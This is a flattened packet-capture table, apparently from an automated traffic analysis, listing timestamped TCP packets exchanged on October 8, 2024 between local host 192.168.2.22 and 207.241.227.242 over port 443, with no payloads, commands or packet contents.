                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.109579086 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.109613895 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.109661102 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.109661102 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.109668970 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.111193895 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.111237049 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.111310959 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.111310959 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.111318111 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.111341953 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.111531973 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.111560106 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.111594915 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.111602068 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.111649990 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.112402916 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.117022038 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.117059946 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.117099047 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.117105007 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.117183924 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.164510965 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.164556980 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.164675951 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.164702892 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.164710999 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.164710999 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.164710999 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.164722919 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.164814949 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.164814949 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.164814949 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.191643953 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.191684008 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.191756964 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.191756964 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.191766977 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.194000006 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.194039106 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.194066048 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.194073915 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.194087029 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.194550991 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.196609974 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.196647882 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.196685076 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.196686029 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.196693897 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.196717024 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.199069023 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.199129105 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.199245930 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.199245930 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.457458973 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.457647085 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.461122036 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.461164951 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.461210012 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.461210012 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.461230993 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.461237907 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.461386919 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.461415052 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.461457968 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.461458921 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.461469889 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.461483955 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.464485884 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.464529991 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.464586020 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.464586020 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.464586020 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.464596033 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.524841070 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.524876118 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.524964094 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.524986029 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.525036097 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.525034904 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.525048971 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.525310040 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.542979002 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.543004036 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.543112993 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.543113947 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.543127060 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.543205976 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.543256998 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.543261051 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.543281078 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.543329954 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.544548035 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.544584990 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.544627905 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.544627905 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.544639111 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.544713974 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.548098087 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.548155069 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.548222065 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.548228979 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.548274994 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.548340082 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.548369884 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.548437119 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.548437119 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.548444986 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.551465988 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.551490068 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.551584959 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.551584959 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.551593065 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.551784992 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.611058950 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.611093044 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.611192942 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.611192942 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.611192942 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.611207008 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.611291885 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.611332893 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.611406088 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.611406088 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.611413002 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.612591028 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.629625082 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.629650116 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.629806995 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.629818916 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.629908085 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.629952908 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.629978895 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.630094051 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.630094051 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.630103111 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.631184101 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.631206036 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.631243944 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.631269932 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.631406069 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.635040998 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.635118008 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.635272026 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.635272026 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.635288000 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.635449886 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.635472059 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.635524035 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.635524035 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.635535955 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.638412952 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.924567938 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.924979925 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.959358931 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.959521055 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.959598064 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.959598064 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.959613085 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.959645987 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.959769964 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.959769964 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.959781885 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.987205982 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.987252951 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.987402916 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.987402916 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.987412930 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.987860918 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.987883091 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.987924099 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.987930059 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.987941980 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.992861986 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.992889881 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.993001938 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.993001938 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.993010998 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.008441925 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.008469105 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.008511066 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.008536100 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.008542061 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.010294914 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.010323048 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.010355949 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.010364056 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.010371923 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.011476994 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.011498928 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.011564016 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.011564016 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.011564016 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.011575937 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.045974970 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.046017885 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.046073914 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.046073914 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.046073914 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.046103001 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.046315908 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.046344995 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.046386957 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.046396017 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.046410084 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.074167013 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.074199915 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.074487925 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.074487925 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.074500084 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.075045109 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.075066090 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.075229883 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.075229883 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.075239897 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.079632044 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.079663038 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.079706907 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.079725027 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.079771996 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.095454931 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.095478058 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.095552921 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.095562935 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.095695972 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.097024918 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.097052097 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.097105980 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.097105980 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.097124100 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.098170042 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.098191977 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.098242044 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.098242044 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.098252058 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.132935047 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.132963896 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.133002043 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.133018017 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.133032084 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.133300066 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.133322001 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.133364916 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.133364916 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.133378029 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.144689083 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.161212921 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.161240101 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.161307096 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.161318064 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.422833920 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.422990084 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.422990084 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.422990084 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.423011065 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.423089981 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.423111916 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.423173904 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.423173904 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.423183918 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.423228979 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.443661928 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.443697929 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.443802118 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.443814039 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.443937063 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.443958998 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.444017887 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.444017887 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.444025993 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.444299936 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.444327116 CEST44349166207.241.227.242192.168.2.22
